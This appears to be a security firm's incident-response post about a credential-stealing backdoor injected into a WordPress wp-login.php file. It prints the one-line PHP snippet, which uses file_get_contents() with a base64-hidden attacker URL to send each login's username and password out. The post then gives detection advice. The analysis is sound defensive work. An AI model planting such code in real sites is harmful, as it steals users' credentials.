From the hacker’s perspective, maintaining access to a compromised website for as long as possible, is ideal. One way to achieve this goal, is by stealing user’s credentials. This method also could provide the chance to spread the attack across other platforms, in case the user has the same password on other services, like email for example.
Once the attackers inject the code into the site, they must send the stolen data somewhere. It could be either stored on a local file, or sent remotely to an email address or another server.
During an Incident response investigation, we identified such malicious codes sending the credentials to a remote website controlled by the attacker. This code was very interesting because it didn’t use the regular methods, like the mail() function, or creating a curl request. Instead, attackers used file_get_contents().
The following snippet was found inside the wp-login.php file:
...if ( !is_wp_error($user) && !$reauth ) { file_get_contents(base64_decode('aHh4cDovvL2luZm<REMOVED CONTENT>/dXJsPQ==') .$_SERVER['HTTP_HOST'].'&user='.$_POST['log'].'&pwd='.$_POST['pwd']); if ( $interim_login ) {...The malicious code is just one line long making it difficult to spot by the untrained eye on a complex file like wp-login.php. The base64 encoded string is translated to “hxxp://infected-site.com/getpwd.php?url=”, the hacker-controlled site.
The ‘wp-login.php’ is a WordPress core file and it shouldn’t have any modification from its original version (unless the WordPress provides an official update to it).
Using a File Integrity Monitoring System may help you on detecting these modifications and take all the necessary actions to prevent further damage to your website online presence. We also recommend having a Website Firewall Application in place to prevent brute force and unauthorized access to your back-end interface.
Krasimir Konov
Luke Leal
Mohit Jawanjal
John Castro
Denis Sinegubko